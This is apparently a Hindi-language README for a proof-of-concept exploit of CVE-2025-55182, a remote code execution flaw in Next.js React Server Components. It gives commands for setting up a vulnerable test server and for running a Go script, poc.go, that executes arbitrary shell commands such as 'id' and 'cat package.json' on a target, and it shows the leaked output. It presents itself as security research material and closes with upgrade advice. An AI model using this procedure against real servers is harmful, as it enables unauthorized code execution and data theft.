
CVE-2025-55182 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो RSC अनुरोधों में असुरक्षित डिसीरियलाइज़ेशन के माध्यम से Next.js RCE कमजोरी है। इसमें एक Go-आधारित POC स्क्रिप्ट और सुरक्षा अनुसंधान और शिक्षा के लिए एक कमजोर टेस्ट सर्वर शामिल है।
⚠️ यह उपकरण केवल सुरक्षा अनुसंधान और शैक्षिक उपयोग के लिए है। कृपया अवैध उद्देश्यों के लिए उपयोग न करें। ⚠️
CVE-2025-55182 Next.js फ्रेमवर्क में एक गंभीर रिमोट कोड एक्ज़ीक्यूशन (RCE) भेद्यता है। यह भेद्यता Next.js द्वारा React Server Components (RSC) अनुरोधों को संसाधित करते समय असुरक्षित डिसीरियलाइज़ेशन समस्या से उत्पन्न होती है। हमलावर दुर्भावनापूर्ण HTTP अनुरोध बनाकर, बिना प्राधिकरण के सर्वर पर मनमाना कोड निष्पादित कर सकते हैं।
प्रभावित संस्करण:
यह प्रोजेक्ट एक कमजोर Next.js परीक्षण सर्वर test-server प्रदान करता है।
सुनिश्चित करें कि आपने Node.js और npm स्थापित किया है।
cd test-server
npm install
npm run dev
सर्वर डिफ़ॉल्ट रूप से पर चलता है।
http://localhost:3000नोट: यदि लॉक फ़ाइल त्रुटि होती है, तो निम्न चलाने का प्रयास करें:
rm -f .next/dev/lock && npm run dev
यह प्रोजेक्ट Go भाषा में POC स्क्रिप्ट poc.go प्रदान करता है।
उपयोग:
go run poc.go [लक्ष्य URL] [निष्पादित करने का आदेश]
उदाहरण:
id कमांड निष्पादित करें (डिफ़ॉल्ट)
go run poc.go
या
go run poc.go http://localhost:3000 id
वर्तमान निर्देशिका फ़ाइलें देखें
go run poc.go http://localhost:3000 "ls -la"
फ़ाइल सामग्री देखें
go run poc.go http://localhost:3000 "cat package.json"
अपेक्षित आउटपुट:
हालाँकि HTTP स्थिति कोड 500 लौटाता है, कमांड निष्पादन परिणाम प्रतिक्रिया के digest फ़ील्ड में शामिल होगा।
1:E{"digest":"uid=502(hoosin) gid=20(staff) ...","name":"Error","message":"NEXT_REDIRECT",...}
Next.js को सुरक्षित संस्करण में अपग्रेड करें:
npm install next@latest react@latest react-dom@latest